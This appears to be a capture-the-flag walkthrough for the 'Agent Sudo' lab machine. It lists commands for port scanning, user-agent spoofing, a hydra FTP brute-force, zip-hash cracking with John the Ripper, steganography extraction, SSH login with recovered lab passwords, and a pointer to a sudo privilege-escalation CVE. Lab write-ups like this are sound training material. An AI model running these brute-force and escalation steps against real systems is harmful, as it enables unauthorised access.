Agent Sudo

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.89.53

We have 3 open ports, which is the answer to the first question in this task

Detailed Nmap Scan :

Command Breakdown:

(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.89.53

Task 2: Enumerate

Lets visit the website now and check what we are working with.

It tells us to change the user-agent parameter to our own codename and access the site, so lets try doing that, but first we have to see how a request is being sent using curl. We can check by first using the command:

Command Breakdown:

(-A): Specifying the user-agent
(-L): Follows any redirections

curl -A "R" -L 10.10.89.53

It works, so lets try changing the user-agent to a different letter as one of the agents name is R which is a single letter, so I'm thinking others would have a single litter codename too. So after trying a few codenames I found one that gives us different results. Which is codename C.

curl -A "C" -L 10.10.89.53

We can see that agent C's actual name is Chris. And now we can answer questions 2 and 3, We can redirect ourselves to the secret page by changing the user-agent parameter.

The name of the agent is Chris

Task 3: Hash cracking and brute-forcing

Now we found ourselves a username and we can try bruteforcing FTP that is running on port 21 with the help of hydra.

Command Breakdown:

(-l): Specifying username
(-P): Specifying a file with passwords to crack the password.
(ftp): Specifying which protocol to attack.

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.89.53 ftp

And we found the password, which is also the password to the first question of this task.

Lets now login into FTP

ftp 10.10.89.53

Lets list what is there in the server.

There are three files, we cannot read or see them here, so lets transfer them to our machine using the command get

get <file_name>

Out of the three , one is a text file, so lets read it.

cat To_agentJ.txt

So we have to get the password which is hidden in one of the pictures we downloaded to our machine. So lets use a tool called binwalk which is used for finding hidden information in a file.

binwalk cutie.png

We can see that there is a hidden zip file within the file, so lets extract it with the flag (-e)

binwalk -e cutie.png

Looking in the directory we can see that there is a zip file that we cannot access as it is encrypted and needs a password. So we can try cracking the password using a module in johntheripper called zip2john.

zip2john 8702.zip > hash.txt

Now lets try cracking the hash with JohnTheRipper

john hash.txt

We found the password which is alienwhich is also the answer to the second question in this task.

Lets unzip the file using 7zip

7z e 8702.zip

And we get a new file called To_agentR.txt, lets read it.

cat To_agentR.txt

Lets copy that string a put it in CyberChef. After putting it into CyberChef it says that it means Area51 which looks like a password, so now lets try finding hidden files in the other image file we downloaded from FTP.

steghide --extract -sf cute-alien.jpg

Lets read message.txt

cat message.txt

So now we know that the password for Chris is hackerrules, lets try to ssh into the machine using these credentials. We also know the name of the other agent which is James. With this information we can answer the last three questions of this task.

Task 4: Capture The User Flag

Now lest login through ssh as James as we have his password.

ssh james@10.10.71.234

And we can find the user flag in /home/james directory and it is also the answer to the first question of the task. We also see another file called Alien_autospy.jpg and the second question of the task is asking us what the incident of the photo is called. So for that we need to first transfer the file to our machine and we can use this command on our machine to do that.

scp james@10.10.71.234:Alien_autospy.jpg /root/Desktop/TryHackMe/AgentSudo

The directory that I specified is the directory I want the file to be in

And now we have the file in our machine. Lets do a reverse google image search and see what incident this image is connected to. First we go to google images, and then we find the option to upload images after clicking the camera icon.

Now choose the file and then we get a result saying the Roswell Incident. The answer to the last question in this section is Roswell Alien Autopsy

Task 5: Privilege Escalation

The first command that we should run is sudo -l as it will tell us what we can run as other users.

sudo -l

Looks like we can run (ALL, !root) /bin/bash, so lets take this and put it on google. Once we do it gives us a CVE number (CVE-2019-14287) and after reading through this exploit, we can see that there is a command that escalates our privileges to root.